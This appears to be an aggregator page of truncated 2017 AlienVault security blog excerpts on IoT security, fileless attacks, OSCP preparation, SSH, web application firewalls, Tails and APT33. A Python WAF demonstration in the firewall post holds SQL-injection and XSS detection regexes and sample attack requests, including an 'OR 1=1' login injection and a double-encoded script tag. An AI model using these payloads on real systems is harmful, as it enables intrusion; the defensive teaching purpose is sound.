There seems to be all sorts of advice on the Internet on how to secure IoT devices.
When not advertising products that could “protect all your Internet-connected home devices from hackers”, much of the user-targeted advice found online seems to be centered around very basic security advice such as strong passwords, two-factor authentication (2FA), software/firmware updates, encryption, firewalls, etc., or slightly more advanced approaches such as installing a Unified Threat Management (UTM) appliance (in other words, suggesting that home users buy products targeted at businesses), “protecting the perimeter” (with no accompanying explanation to the user as to what a perimeter is), etc. While some of this advice is useful to protect users from obvious vulnerabilities/threats, most of it might do more harm than good and lull users into a false sense of security (e.g. you are not automatically safe if you encrypt and/or 2FA all the things). Further, directly transposing security solutions targeted at large IT infrastructures to home users without meaningfully tailoring them to novice users is not a great strategy (e.g. risk assessment is something traditionally performed by security professionals, and expecting a novice user to perform it meaningfully, especially in an interconnected ecosystem like the IoT with complex, non-obvious attack paths, is an unfair burden; the same goes for asking home users to use products targeted at enterprise security). In essence, educating users can only go so far in a complex ecosystem such as the IoT, and we are still left with problems such as these:
- Users might not be able to assess what is relevant/irrelevant information, and meaningfully internalize the security advice that is available online.
- Users might lack the technical expertise to gauge how the threats/vulnerabilities apply in context.
- Users might lack the experience to analyze how the information on threats/vulnerabilities/advice fits into the bigger picture (i.e., their overall Personal Threat Model).
So, it looks like we need some sort of framework to address the issues listed above. In my recent op-ed for Ars Technica, I discussed how there currently are no proper mechanisms to help users assess their risk in the IoT ecosystem, and how Personal Threat Models are quite inadequate in this context. In an attempt to reduce the ambiguity around users determining their risk tolerance t...

AlienVault Blog, 2017-11-14T14:00:00+00:00. http://feeds.feedblitz.com/~/492299818/0/alienvault-blogs~Primeing-for-Amazon-and-Other-IoT-Devices | www.secnews.physaphae.fr/article.php?IdArticle=432889

Busting 5 Myths About Fileless Attacks

The threat landscape is constantly evolving, and we’re currently seeing a growing number of cyber criminals making a fundamental change in the way they carry out their attacks. Rather than installing executable files via phishing that antivirus solutions can easily scan and detect, they’re utilizing exploits, scripts, and otherwise legitimate administration tools to run malicious code directly from memory. As a result, these “fileless” attacks are bypassing traditional security defenses and wreaking havoc on victim networks. With fileless attacks on the rise, there still remains a great deal of confusion around the use of the term “fileless” and what it actually means. To clarify what constitutes a fileless attack and help you better prepare your organization for facing them, let’s debunk five of the most common myths and misunderstandings:

Myth #1: Fileless attacks never involve files

Perhaps the biggest point of contention and confusion surrounding fileless attacks is that they can and often do involve files, especially during the early initial infection stage. For example, an attack may begin with an employee tricked into opening a Word document they receive in a phishing email, and activating a macro or script embedded inside.
That macro or script launches PowerShell, a legitimate framework built into Windows for automating system administration tasks. From there, the attacker uses PowerShell to execute malicious code directly in memory, making the attack from this point forward truly fileless. Because attacks can have both fileless and file-based components, debating whether they’re truly 100% fileless from start to finish is beside the point. Terms like “fileless attack” and “fileless malware” are used interchangeably, but they’re often misnomers that simply imply an attack utilizes fileless tactics or techniques at one stage or another.

Myth #2: Fileless attacks are a brand new threat

In truth, many fileless techniques have been around for some time. In-memory exploits, for example, date back to the prolific Code Red and SQL Slammer worms of the early 2000s. Metasploit, the open source framework for developing and executing remote exploit code, was created in 2003. Mimikatz, a popular penetration testing tool for dumping credentials straight from memory, has been around since 2011. Both have been used to carry out attacks that actively avoid writing malicious executable files to disk. One of the reasons we’re seeing such a growing influx of fileless attacks now, however, is that many antivirus vendors are bolstering their file-scanning capabilities with advances in machine learning. In response, attackers are revisiting these pre-existing fileless tools and techniques and utilizing them to bypass file-scanning security solutions altogether.
Myth #3: Only APT and nation-state actors use fileless techniques

Many high-profile fileless attacks conducted in the past have involved sophisticated hacking groups (Stuxnet, Duqu, etc.), but now we’re also seeing fileless techniques being incorporated into a far wider variety of attacks, such as ransomware campaigns.

AlienVault Blog, 2017-11-13T14:00:00+00:00. http://feeds.feedblitz.com/~/491667960/0/alienvault-blogs~Busting-Myths-About-Fileless-Attacks | www.secnews.physaphae.fr/article.php?IdArticle=432118

New AlienVault USM Anywhere™ Editions Expand Pricing and Deployment Flexibility for All

Today, we are taking further action to make security monitoring accessible for all with the launch of new editions-based pricing and deployment options for USM Anywhere. Our three new USM Anywhere Editions (Essentials, Standard, and Enterprise) expand the pricing and deployment flexibility for organizations of all sizes and budgets, from the SMB to the Enterprise. Whether it’s a small business getting started with its security program, a mid-size organization with a mix of on-premises and public cloud infrastructure, a geographically distributed enterprise with multiple sites, or an MSSP monitoring multiple customers’ environments, any organization can choose the best deployment option to meet its security and compliance goals without the upfront investment and risk associated with traditional security solutions. And, as a subscription-based cloud service, USM Anywhere readily scales and adapts to continually meet IT and business needs as they evolve.

USM Anywhere Essentials Edition

AlienVault USM Anywhere Essentials Edition provides the essential security capabilities needed for effective threat detection and response.
This option provides an affordable entry point for organizations with a limited budget or security resources to establish a security and compliance program quickly, easily, and affordably.

USM Anywhere Standard Edition

AlienVault USM Anywhere Standard Edition is ideal for IT security teams that are looking to gain operational efficiency and significantly reduce their time to response (TTR) through advanced security orchestration, automated incident response, and deep security analysis. This edition includes integrated ticketing and alerting with third-party tools like Jira, ServiceNow, and Slack, as well as advanced threat detection capabilities, including dark web monitoring.

USM Anywhere Enterprise Edition

AlienVault USM Anywhere Enterprise Edition is designed for organizations with large or heavily distributed IT environments. It includes all of the features of Essentials and Standard, plus higher capacity options for monthly data volumes and federation capabilities for centralized security monitoring across multiple sites and infrastructures. Additionally, for the USM Anywhere Standard and Enterprise Editions, we’ve added 24 x 5 and 24 x 7 support respectively, monthly technical success checks with a technical account manager, and much more. To discover all of the features and deployment details of each USM Anywhere Edition, visit our pricing page here. To learn more about AlienVault customer success, visit the AlienVault Mission Control.

AlienVault Blog, 2017-11-07T14:00:00+00:00. http://feeds.feedblitz.com/~/487807924/0/alienvault-blogs~New-AlienVault-USM-Anywhere%e2%84%a2-Editions-Expand-Pricing-and-Deployment-Flexibility-for-All | www.secnews.physaphae.fr/article.php?IdArticle=429715

How to Prepare to Take the OSCP

...Penetration Testing with Kali (PWK) course. Taking the course is mandatory for you to become eligible to take the OSCP.
In addition to the knowledge you gain from the course, it opens doors to several career opportunities in information security. Of course, those who pass get bragging rights too. If you ask OSCP-takers about the difficulty level of the exam, you will get varied answers, but most people say that it's the most difficult exam they've taken in their lives. This is why it is critical to prepare well for it. The PWK course doesn’t teach you everything, but the materials are enough to get you started. I cannot emphasize enough the importance of preparing prior to the course. Here’s a list of the things you need to learn to get prepared for the OSCP:
- Linux and Windows environments - You need to be familiar with both. These will help you spot clues for privilege escalation. I’m a Windows guy and during the labs I learned Linux the hard way.
- Linux and Windows commands - Knowing Linux and Windows commands helps a lot. Brush up on them!
- Basic programming skills - Expect to debug and rewrite exploits, so know Bash scripting. This will help you to automate redundant tasks.
- Web application attacks (SQLi, XSS, Local File Inclusion, Remote File Inclusion and Command Execution) - Expect a lot of web application content in the labs. Also practice bypassing web security filters for injection attacks.
- Metasploit Framework - Brush up on creating payloads with different formats, using multi handlers, and using staged vs non-staged payloads. Knowing these things will save you some time during your exam.
- Nmap - Different scanning techniques and Nmap NSE scripts will help you a lot during your lab or exam.
- Netcat and Ncat - You’ll be using these a lot during the OSCP.
- Wireshark and tcpdump - These are important because you’ll be using Wireshark to debug your exploit, or tcpdump when machines don’t have a GUI.
- Windows and Linux privilege escalation - Aside from using kernel exploits, brush up on misconfigurations like weak service/file permissions and NFS/shares.
- Escaping restricted shells and spawning shells - You’ll encounter these a lot during your OSCP.
- File transfer - It is important that you know the different techniques to transfer files to a target machine.

Aside from those topics, these books will also come in handy:
- Kali Linux Revealed - To freshen up your Linux fundamentals.
- Penetration Testing: A Hands-on Introduction to Hacking - One of my favorite books. This book covers almost all the aspects of what the OSCP entails.

AlienVault Blog, 2017-11-06T14:00:00+00:00. http://feeds.feedblitz.com/~/487089782/0/alienvault-blogs~How-to-Prepare-to-Take-the-OSCP | www.secnews.physaphae.fr/article.php?IdArticle=428953

Things I Hearted this Week – 3rd November 2017

...Red Cross in 2016.

Contractor breach exposes 50k Aussie govt, bank staff records | IT News
AMP among companies affected by data breach of 50,000 staff records | The Guardian

Wrestling student hacks grades

A former chemistry student allegedly used keystroke-logging gadgets to steal tutors' passwords, change classmates' grades and download copies of exams ahead of time. Amateur wrestler Trevor Graves, 22, who studied at the University of Iowa, was arrested and indicted this month on two hacking charges, each of which could land him up to ten years in the clink if found guilty. In paperwork (pdf) submitted to an Iowa district court, FBI agent Jeffrey Huber recounted that in December of last year one of the university's teachers noticed that Graves' grades had mysteriously improved.

High-tech cheating scheme prompts charges at University of Iowa | Press Citizen
FBI: Student wrestler grappled grades after choking passwords from PCs using a key logger | The Register

Hackers Using Default SSH Creds to Take Over Ethereum Mining Equipment

A threat actor is mass-scanning the Internet for Ethereum mining equipment running ethOS that is still using the operating system's default SSH credentials.
The attacker is using these creds to gain access to the mining rig and replace the owner's Ethereum wallet address with his own. Replacing this wallet ID sends all subsequent mining revenue to the attacker instead of the equipment's real owner. Change your default credentials, kids. Or better still, manufacturers: force users to change default credentials on first use!

Hackers Using Default SSH Creds to Take Over Ethereum Mining Equipment | Bleeping Computer

How to become a pentester

This one is from the archives, but it is equally relevant today as it was two years ago when published. It goes through a lot of the methodology and answers most questions budding pen testers would have.

How to become a pentester | Corelan Team

Circle with Disney web filter riddled with vulnerabilities

A ‘smart’ thing made by Disney has more holes in it than Swiss cheese. Who could have ever predicted such a thing? Circle...

AlienVault Blog, 2017-11-03T13:00:00+00:00. http://feeds.feedblitz.com/~/485064892/0/alienvault-blogs~Things-I-Hearted-this-Week-%e2%80%93-rd-November | www.secnews.physaphae.fr/article.php?IdArticle=427990

Explain How SSH Works to Me

Tatu Ylönen, CEO and founder of SSH Communications Security, wrote about how he invented SSH in SC Magazine: “While attending school in Helsinki, I discovered a password ‘sniffer’ attack in our university network. To shield our data, I wrote a program to protect information as it moved from point to point throughout the network. I called it the 'secure shell', or SSH for short.” Today, nearly every major network environment, including those in governments, large enterprises and financial institutions, uses a version of SSH to protect data in transit and let administrators manage systems remotely. Talk about turning lemons into lemonade.
Ylönen was dissatisfied by the lack of security in the rlogin, Telnet, FTP, and rsh protocols, so he devised his own solution. He released the first version of SSH as freeware in July 1995. Adoption exploded. By the end of 1995 there were about 20,000 SSH users. He founded SSH Communications Security by December 1995. By the year 2000, there were about 2 million SSH users. SSH has been assigned TCP port 22. Many operating systems have SSH software preinstalled, including most versions of Linux, macOS, Solaris, FreeBSD, OpenBSD, NetBSD, and OpenVMS. There are SSH applications for Windows, but they aren't preinstalled and must be installed manually.

So, here's how SSH works

The SSH protocol is based on the client-server model. Therefore, an SSH client must initiate an SSH session with an SSH server. Most of the connection setup is conducted by the SSH client. Public key cryptography is used to verify the identity of the SSH server, and then symmetric key encryption and hashing algorithms are used to keep data transmission in ciphertext. That way, the privacy and integrity of data transmission in both directions between the client and server is assured, and man-in-the-middle attacks are mitigated. The steps involved in creating an SSH session go like this:
1. The client contacts the server to initiate a connection.
2. The server responds by sending the client its public key.
3. The server negotiates parameters and opens a secure channel for the client.
4. The user, through their client, logs into the server.

There are different ciphers that can be used for SSH depending on the applications being used.
Ciphers commonly offered by SSH implementations include ChaCha20 (chacha20-poly1305), AES-GCM, Blowfish-CBC, AES128-CTR, AES192-CTR, AES256-CTR, Arcfour and CAST128-CBC. Of these, the CBC ciphers and Arcfour are legacy options that current OpenSSH releases disable by default; prefer ChaCha20-Poly1305, AES-GCM or AES-CTR. Usually either an implementation of

Published 2017-11-01. www.secnews.physaphae.fr/article.php?IdArticle=426693

Do I Need a Penetration Test?

penetration test. I cannot tell you how many professionals consider this the de facto (and sometimes only) test of their security. Unfortunately, when taken alone, they are testing the wrong thing. In the recent Cyber Security Intelligence Index, IBM found that 60% of breaches occur from insider threats. That means that 60% of the time your data isn’t stolen by someone breaking into your network; you gave them the keys.

Don’t get me wrong, a penetration test absolutely has its place in a holistic security program, but a security program it is not. The insider threat statistic mentioned earlier doesn’t necessarily mean your organization is full of individuals waiting for the right time to sell your intellectual property to your biggest competitor; it means that the breaches that occurred were a result of insider action. The difference is fairly nuanced, so let me give you a few examples:

1. A system administrator’s phone downloads malicious software that allows access to the organization’s databases.
2. An accounting clerk receives an email that appears to be from the CFO requesting a wire transfer to an overseas bank account.
3. The CEO clicks on a link from his daughter containing malicious software.
4. The HR director uses his personally owned computer, which is infected with remote control software, to connect to sensitive HR documents over the organization’s VPN.

These scenarios happen far more than you think. How many of the above examples would be identified via a penetration test? Nada.
Unfortunately, the biggest threat to corporate security is corporate employees, whether malicious or not. To counteract this threat, you need a comprehensive security program.

What is a comprehensive security program?

I’m glad you asked. A security program is a set of actions and documents which outline what the organization is securing and how it secures sensitive information. The end goal of a security program is to establish clear and concise metrics and goals which allow the ever-changing organization to adapt to new threats and identify weaknesses.

The first step of a security program is to define the program itself in what is called a security plan. The security plan is simply the identification of what is going to be secured, responsibilities, and direction. We’re going to be speaking with stakeholders (leadership, data owners, users, etc.) to identify what sensitive information exists and where. When speaking of responsibilities, we’re not speaking of who is responsible for securing what data but, rather, who is responsible for establishing, testing, and maintaining the program. There needs to be leadership buy-in for the security program to be successful, as the inevitable change that will occur is rarely comfortable. The ship is doomed to failure if there is no end goal in mind. “Total security by December” is not an end goal. Direction is more the ‘how’ than the ‘what’.
How is your plan going to be tested, implemented, designed

Published 2017-10-31. www.secnews.physaphae.fr/article.php?IdArticle=426027

Things I Hearted This Week – 27th October 2017

The Equifax Breach: Former White House CIO Believes Marketers Need To Be Engaged In Cybersecurity | Forbes

Public speaking for academic economists

The title of this is probably the furthest thing you might expect from information security, but it made my list this week because it is actually very relevant. Just like academics, information security professionals often have to convey complex concepts to non-security professionals. This deck lays out a lot of very useful points that are worth bearing in mind.

Public speaking for academic economists | Dropbox link

Equifax woes continue

The UK financial regulator is stepping into the mess following the huge breach at Equifax. The regulator has said it is investigating the circumstances, and has the power to fine or even revoke the company's right to operate in the UK.

UK financial regulator confirms it is probing Equifax mega-breach | The Register
Equifax under FCA investigation over data breach | The Telegraph
FCA launches probe into Equifax | Financial Times

Ghost of scammers

In a story that proves that nothing is sacred to scammers, a Louisiana-based funeral home had its email account taken over and scam emails sent out to customers and suppliers asking for money. If a funeral home isn’t safe from hackers, who is?

Hackers Take Over Funeral Home's Email Account and Run Online Scams | Bleeping Computer

Google testing Android feature to hide DNS requests

Google has added support in Android for an experimental feature that encrypts DNS requests and prevents network-level attackers from snooping on user traffic.
This new feature is named "DNS over TLS", a protocol specified by the Internet Engineering Task Force (IETF), an Internet standards body, in RFC 7858. Note that it hides the content of DNS queries from the network, not the IP addresses you subsequently connect to.

Android getting “DNS over TLS” support to stop ISPs from knowing what websites you visit | XDA Developers
Google testing Android feature to hide DNS requests | Bleeping Computer

Published 2017-10-27. www.secnews.physaphae.fr/article.php?IdArticle=425006

Explain How a Web Application Firewall Works

OWASP has been very active in defining techniques for writing web applications that make them more resistant to such attacks; this great resource explores the topic in some depth. OWASP provides excellent resources to help developers who are interested in writing secure web applications. However, not all applications are written with these guidelines in mind, so it's very important that web servers have IPS, IDS, and standard firewalls in their network to prevent attacks as well. Unfortunately, those appliances will not be able to prevent XSS attacks, SQL injection, or web session hijacking if your web applications are vulnerable to those kinds of attacks, because the malicious input arrives as ordinary, well-formed HTTP. In order to adequately protect web servers and applications, therefore, you should consider adding specialized web application firewalls to your network.

Like other types of firewalls, web application firewalls can be hardware devices, software, or both. Web application firewall software is generally available as a web server module (ModSecurity, for example) or as an inline reverse proxy in front of the web server. Whether software or hardware, a web application firewall analyzes the GET and POST requests sent through HTTP and HTTPS, and applies configured firewall rules to identify and filter out malicious web traffic.
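To make the GET/POST inspection concrete, here is an added example (not the article's code, and not any vendor's product) of a minimal rule engine in Python's standard library. It parses a raw HTTP request and applies the two inspection models the article goes on to describe: a blacklist of attack signatures (negative model) and a whitelist of known routes and parameter formats (positive model). The routes /login and /search, their parameter patterns, the hostname shop.example and the sample requests are all constructed for the demo.

```python
"""Minimal WAF rule engine over raw HTTP requests: blacklist signatures versus
a whitelist of allowed routes and parameter formats.

Added example, not the article's code nor a product's. Routes, parameter
patterns and the sample requests are CONSTRUCTED for the demo.
"""
import re
from urllib.parse import parse_qs, unquote, unquote_plus

# Negative model: attack signatures matched against decoded parameter values.
# Blacklists are cheap to deploy but prone to both evasion and false positives.
SIGNATURES = {
    "sqli": re.compile(r"('|\")\s*(or|and)\s+[\w'\"]+\s*=\s*[\w'\"]+|union\s+select|--\s|;\s*drop\s", re.I),
    "xss": re.compile(r"<\s*script|javascript:|on\w+\s*=", re.I),
}

# Positive model: every route the application exposes, the methods it accepts,
# and a pattern for each parameter. Anything not listed here is rejected.
ALLOWED_ROUTES = {
    "/login": {"methods": {"POST"},
               "params": {"user": re.compile(r"^[\w.@-]{1,64}$"), "pass": re.compile(r"^.{1,128}$")}},
    "/search": {"methods": {"GET"}, "params": {"q": re.compile(r"^[\w\s-]{0,100}$")}},
}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and merged query/body params."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params = dict(parse_qs(query, keep_blank_values=True))
    if method == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return {"method": method, "path": unquote(path), "headers": headers, "params": params}


def normalize(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (a classic WAF evasion) before inspecting a value."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def negative_model(req: dict):
    """Blacklist check: name of the first matching signature, or None."""
    for name, values in req["params"].items():
        for value in values:
            text = normalize(value)
            for sig_name, pattern in SIGNATURES.items():
                if pattern.search(text):
                    return f"{sig_name} in parameter '{name}'"
    return None


def positive_model(req: dict):
    """Whitelist check: reason the request falls outside the allowed model, or None."""
    route = ALLOWED_ROUTES.get(req["path"])
    if route is None:
        return f"unknown route {req['path']}"
    if req["method"] not in route["methods"]:
        return f"method {req['method']} not allowed on {req['path']}"
    for name, values in req["params"].items():
        pattern = route["params"].get(name)
        if pattern is None:
            return f"unexpected parameter '{name}'"
        for value in values:
            if not pattern.match(normalize(value)):
                return f"parameter '{name}' fails its allowed pattern"
    return None


def inspect_request(raw: str, model: str = "both") -> tuple:
    """Return ('allow', None) or ('block', reason) under 'negative', 'positive' or 'both'."""
    req = parse_request(raw)
    if model in ("negative", "both"):
        hit = negative_model(req)
        if hit:
            return ("block", hit)
    if model in ("positive", "both"):
        hit = positive_model(req)
        if hit:
            return ("block", hit)
    return ("allow", None)


# Constructed sample traffic.
CLEAN_SEARCH = "GET /search?q=blue+widgets HTTP/1.1\r\nHost: shop.example\r\n\r\n"
SQLI_LOGIN = ("POST /login HTTP/1.1\r\nHost: shop.example\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
              "user=admin%27+OR+%271%27%3D%271&pass=x")
XSS_DOUBLE_ENCODED = "GET /search?q=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1\r\nHost: shop.example\r\n\r\n"
UNKNOWN_ROUTE = "GET /admin/export?all=1 HTTP/1.1\r\nHost: shop.example\r\n\r\n"

if __name__ == "__main__":
    for label, raw in [("clean", CLEAN_SEARCH), ("sqli", SQLI_LOGIN),
                       ("xss (double-encoded)", XSS_DOUBLE_ENCODED), ("unknown route", UNKNOWN_ROUTE)]:
        print(f"{label:22} negative={inspect_request(raw, 'negative')}  positive={inspect_request(raw, 'positive')}")
```

Two things the output shows that the paragraph alone does not: the double-encoded script tag only matches a signature after the value is decoded a second time, which is why normalisation before matching is essential; and the request to the unlisted /admin/export route passes the blacklist untouched but is rejected by the whitelist, which is the trade-off between the two models in one line.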
In my recent "Explain How a Firewall Works" post, I identified the three main types of firewalls: stateless, stateful, and application firewalls. Web application firewalls are basically specialized application firewalls that analyze the content of requests, not just packet headers. Web application firewalls catch malicious web traffic that other security appliances might miss before it reaches the actual web server. When properly implemented, they can also help your organization comply with PCI-DSS and HIPAA regulations. In addition, a web application firewall's logging can be integrated into a SIEM solution so that security administrators can more effectively monitor your web servers' security. (There are HIPAA and PCI-DSS requirements that specifically pertain to web security; PCI-DSS requirement 6.6, for instance, calls for public-facing web applications to be either reviewed regularly or protected by an automated solution such as a web application firewall. Implementing a properly configured web application firewall can aid in compliance with those requirements.)

As part of its operation, a web application firewall can respond to web traffic by blocking requests that have been identified as malicious, it can send a user a CAPTCHA challenge to prove that they're not a bot, and some products can even simulate attacks to help you identify vulnerabilities.

A web application firewall can be configured according to three basic security models. One model may be more effective than the others depending on the specific context of the web server and application. A whitelisting model only allows web traffic according to an explicit list of what is permitted

Published 2017-10-25. www.secnews.physaphae.fr/article.php?IdArticle=423624

Achieving Online Anonymity Using Tails OS

Whonix is an ideal example; it can act as an Internet gateway for any operating system and it routes all traffic through the Tor network. However, Whonix is not the only option. Tails OS is another.
It got immense visibility after it was revealed that NSA whistle-blower Edward Snowden used Tails to hide his identity while sharing NSA secrets with journalists Glenn Greenwald and Laura Poitras.

How is Tails OS Unique?

Unlike Whonix, Tails OS is a live system designed to be booted from a USB stick or DVD. Whonix is installed on the hard drive and uses hard-disk space, whereas Tails runs entirely from RAM. Thus it leaves no trace on the machine, even to someone with physical access to your computer, unless you deliberately enable its optional encrypted persistent storage. Tails is a free Debian-based OS designed to preserve your privacy and anonymity. It also comes with all the necessary applications, such as a web browser, messaging client, office suite, email client and more.

Tails does not depend on the host operating system or hard drive. Since you can use Tails via USB/DVD, it is effectively plug and play: you can use Tails from your friend’s computer, a public library, or anywhere else. It leaves no traces because it runs from RAM, which is automatically erased when the computer shuts down.

How to Configure Tails on a USB Drive

This section discusses the steps to configure Tails OS on a USB drive. You can download the live image of the OS and create a bootable USB stick. Another way is to temporarily boot the Tails OS in a virtual machine and create the bootable USB stick from there. To do this, you need the following:

- Tails OS ISO (download from the official website and verify its signature)
- USB stick (with more than 8GB of space)
- VirtualBox

1. In VirtualBox, click New and give your image a name. Select Linux under Type and Debian (64-bit) for the Version.
2. On the next screen, allocate the memory. 1024 MB is sufficient to start with.
3. Do not create a virtual hard disk: Tails is a live OS and it is not supposed to be installed on the hard drive. So, in the next step, select the first option (do not add a virtual hard disk) and continue.
4. Go to the settings of the newly created virtual machine and load the downloaded ISO in the Storage section.
5. Don’t forget to enable the Live CD/DVD option.
6. Plug the USB stick into the port and select the same device in the USB section of the VM settings.

Published 2017-10-24. www.secnews.physaphae.fr/article.php?IdArticle=422850

Best Advice for a Career in Cyber Security

Per the Center for Cyber Safety and Education, by 2022 there will be a shortage of 1.8 million information security workers. So, it is no mystery why leading innovation expert Alec Ross, in his book Industries of the Future, described cyber security as one of the five fields that will most shape our economic future. But if you’re currently on the outside looking into a career in cyber security, how do you break in? Where do you get started? To help answer that, here are 12 tips for a career in cyber security from my colleagues and InfoSec pros at AlienVault.

1. Talk to Someone in InfoSec: Start by doing what I did when faced with writing this blog. I picked some in-house experts, Javvad Malik, Kate Brew and Chris Doman, who had some great advice, as you’ll soon see. So reach out to someone you know who works in cyber security for their pearls of wisdom. Don’t know anyone yet? Don’t worry, we’ll help you fix that below.

2. Pick a Path: We often think of ‘cyber security’ as an overarching phrase, but there are many facets to it, so there are many routes to entry. A pen tester has a different route vs. a risk manager vs. an incident responder. Of course, it’s fine to start with a broad interest area within cyber security. For instance, make it a goal to get your Certified Information Systems Security Professional (CISSP) as a foundation. But eventually, you’ll want to choose a focus area that you like and enjoy.

3. Go to Conferences: There are a number of InfoSec cons to attend for networking.
Yes, you probably will learn a thing or two by going, but focus more on meeting people and networking. The big security conferences like RSA and DefCon are great, but may be overwhelming as a newbie. So here’s a list of some other options: DerbyCon, GrrCON, Cyber Security Summit & Hacker Conference, LASCON, DefCon, ShmooCon. Also, don’t miss the local BSides cons, which are affordable, worldwide and great time spent. Before you go though, make sure you have a hit list of people you want to meet and for what purpose. Introduce yourself to them well in advance. See if you can carve out 10-15 minutes with them for a coffee and have a plan of discussion. Don’t make it sound like an interview, but rather a more casual conversation where you’re asking for guidance. Offer to drop them your CV, so you’ll want to have one printed and ready.

4. Get a Daily Dose of Security Blogs: There are too many great security blogs to list, but I’d be remiss for not mentioning KrebsOnSecurity

Published 2017-10-23. www.secnews.physaphae.fr/article.php?IdArticle=422506

Things I Hearted this Week 20th October 2017

Child safety smartwatches ‘easy’ to hack, watchdog says | BBC

Third of business directors have never heard of GDPR

With GDPR around the corner, and the feeling that you cannot escape the acronym wherever you go, it is quite concerning to learn that a third of business directors haven’t heard of it. While one can understand if the general public is not aware of the upcoming regulation, it is incumbent upon company directors to be aware of their increased responsibilities under GDPR. GDPR is not just another technical or security requirement; it is based on the fundamental privacy rights of citizens and comes with potentially harsh fines.
Despite many months to prepare, it would appear that GDPR may still catch many companies by surprise.

Third of IoD Members Have Never Heard of GDPR | Infosecurity Magazine

Ghosts of vulnerabilities past

It looks like Microsoft’s bug tracking database was infiltrated back in 2013. The company kept the news quiet and moved on. It’s pretty worrying what someone with all that information could have done. How many exploits were made possible because some bad guy somewhere found vulnerabilities they could exploit? A good reminder that companies should take a hard look at their assets and their value: not just value in terms of direct business, but the potential impact on customers.

Microsoft responded quietly after detecting secret database hack in 2013 | Reuters
Microsoft never disclosed 2013 hack of secret vulnerability database | ars technica
Microsoft’s bug tracker was hacked in 2013 but it didn’t tell anyone about it | Silicon Angle

Unmasking the ransomware kingpins

This is a great read by Elie Bursztein on exposing the cybercriminal groups that dominate the ransomware underworld. It’s the third part in a trilogy of blogs. I probably can’t do it justice, so it’s best you go check it out:

Unmasking the ransomware kingpins

A Stick Figure Guide to the Advanced Encryption Standard (AES)

This is an old post, like really old, from 2009. But I only came across it recently and found it to be real

Published 2017-10-20. www.secnews.physaphae.fr/article.php?IdArticle=421708

Streamline Incident Response with USM Anywhere and Jira

In the SANS 2017 Incident Response Survey, nearly half of the survey base reported that, on average, it takes more than 24 hours to contain a threat, and 82% reported a remediation time of one month or longer.
There are many factors that can slow down an incident response process. Commonly, IT and security reside in different parts of the organization and may use different systems to track and prioritize work. Having to work across multiple ticketing workflow systems that are complex to integrate, redundant, or siloed by product can slow down an incident response process or introduce errors into it.

To help reduce the time, complexity, and errors involved in kicking off incident response activities, we’ve brought AlienVault USM Anywhere closer together with Jira, a leading issue and project tracking tool. Today, we’re announcing our newest AlienApp for Jira, available immediately to all USM Anywhere customers. The AlienApp for Jira helps close the gap between threat detection and incident response activities. With the AlienApp for Jira, you can open and track Jira issues directly from USM Anywhere, making it easy, fast, and efficient to monitor the lifecycle of your incident response activities, even across multiple security and IT teams. From any alarm, event, or vulnerability detected in USM Anywhere, you can create a new Jira issue that captures the relevant threat data needed for effective response, saving you time and effort. You can also automate the creation of new Jira issues in response to threats detected in USM Anywhere to further reduce the time between detection and resolution. By combining USM Anywhere with Jira, one of the most widely used tools for both IT service organizations and software development teams, you can streamline your incident response activities and effectively reduce the time to resolution for security incidents.

The Problem

Returning to the Equifax example, let’s look at a simplified scenario of how a vulnerability moves from identification to remediation in many organizations.

1. A regular network scan (usually out of hours) identifies a critical vulnerability.
2. The next day (and sometimes later), a security analyst reviews the scan results and identifies which machines need patching.
3. The security analyst logs into a separate IT ticketing system and manually enters all of the relevant information about the vulnerability.
4. The ticket is added to a long queue of requests for the IT team.
5. The security analyst continually checks the ticketing system (and/or badgers his or her IT colleagues) to see the status of the request.

Now, let’s look at the same scenario with USM Anywhere and Jira working in concert thanks to the AlienApp for Jira.

1. A regular network scan (usually out of hours) identifies a critical vulnerability.
2. A USM Anywhere orchestration rule immediately responds to the new vulnerability by automatically creating an issue in Jira, including the relevant information about the vulnerability and the affected asset.
3. The Jira issue is immediately triaged by the IT team and assigned.
4. The security analyst arrives at work in the morning, checks USM Anywhere, and sees that the vulnerability has been identified

Published 2017-10-18. www.secnews.physaphae.fr/article.php?IdArticle=420698

Newly Discovered Iranian APT Group Brings State-sponsored Cyber Espionage into Focus

Whether it is the hack of Sony in 2014, China’s alleged hack of the US Office of Personnel Management in 2015, or Russia’s alleged hack of the Democratic National Committee in 2016, the stories are mounting. Iran has also been in the cyber espionage news, with major suspected attacks ranging from the Las Vegas Sands attack in 2014 to the DDoS attacks on numerous US banks, for which Iranian nationals were indicted in 2016. Beyond these high-profile attacks, there are also countless low-profile attacks.
While these attacks don’t make the major headlines, they may actually be more relevant to your organization. In this blog, we zero in on this lesser-publicized activity, focusing on a recently discovered Iranian hacker group dubbed APT33, the tools they have developed, and how AlienVault can help you detect this activity in your environment.

What is state-sponsored cyber espionage and what are the typical goals?

First, a quick primer on state-sponsored cyber espionage. State-sponsored cyber espionage is the act of obtaining secrets and information from individuals, competitors, rivals, groups, governments, and enemies, without the permission or knowledge of the holder of the information, usually for economic, political, or military advantage. The goals of these state-sponsored groups or individuals range from basic theft or sabotage, to collecting military and diplomatic information, to enabling domestic organizations to compete on a global economic level.

Why should you care?

Should you be concerned about state-sponsored cyber attacks? In a word, yes. And it’s really the low-profile attacks from state-sponsored hackers that should be most concerning, because the tools and methods that these hackers develop and use can be leveraged by other attackers against your organization. You need to be alerted to and protected against these tools.

Who is APT33?

This leads us to the Iranian group Advanced Persistent Threat 33 (APT33), a group recently chronicled by security firm FireEye. FireEye assesses that APT33 works at the behest of the Iranian government, and attributes to APT33 many breaches of Saudi Arabian, South Korean, and US organizations ranging from the aviation sector to the energy sector. The primary goals of APT33 appear to be to enhance Iran’s domestic aviation capabilities and to support Iran’s military decision making against Saudi Arabia.
Notably, FireEye has found signs of APT33 activity in some of its own clients' networks, but suspects the APT33 intrusions have been on a wider scale.

APT33 has unveiled new tools, including a new backdoor

